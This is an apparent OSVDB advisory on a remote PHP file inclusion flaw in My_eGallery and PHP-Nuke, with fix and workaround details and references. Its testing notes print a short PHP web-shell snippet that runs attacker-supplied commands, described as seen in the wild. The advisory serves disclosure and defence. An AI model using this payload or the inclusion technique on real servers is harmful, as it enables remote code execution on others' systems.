My_eGallery Arbitrary File Inclusion

2003-11-26T08:37:00
ID OSVDB:2867
Type osvdb
Reporter OSVDB
Modified 2003-11-26T08:37:00

Description

Vulnerability Description

My_eGallery contains a flaw that allows a remote PHP include attack. This flaw exists because the application does not validate parameters used in include statements. This allows a user to send a specially crafted URL request that specifies a malicious file from a remote system, which could execute arbitrary code on the vulnerable system.

Technical Description

Certain PHP files used by My_eGallery contain parameters (used in include functions) that are not filtered. An attacker can supply such a parameter which points to arbitraty code on a different web server. This code will execute with the privileges of the vulnerable Web server.

Also of note is that PHP-Nuke can use My-eGallery and is susceptible to this vulnerability as well. However, the author does not support PHP-Nuke (see the second Vendor Specific Advisory URL). A fix for PHP-Nuke has been developed externally (see the Generic Information URL).

Solution Description

Upgrade to version 3.1.1g or higher or apply the vendor provided patch, as both have been reported to fix this vulnerability. It could also be possible to correct the flaw by implementing the following workaround: Disable the 'allow_url_fopen' and 'register_globals' PHP directives. However, it is also possible that this workaround could adversely affect PHP functionality as a whole.

Short Description

My_eGallery contains a flaw that allows a remote PHP include attack. This flaw exists because the application does not validate parameters used in include statements. This allows a user to send a specially crafted URL request that specifies a malicious file from a remote system, which could execute arbitrary code on the vulnerable system.

Manual Testing Notes

Example exploit code that has been seen in the wild is available:

<? // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); print_output(); ?>

References:

Vendor Specific Solution URL: http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5 Vendor Specific Advisory URL Vendor Specific Advisory URL Secunia Advisory ID:10301 Nessus Plugin ID:11931 ISS X-Force ID: 13853 Generic Informational URL: http://ruleit.co.uk/nuke/modules.php?name=News&new_topic=7 Generic Exploit URL: http://packetstormsecurity.nl/0311-exploits/myegallery.txt Bugtraq ID: 9113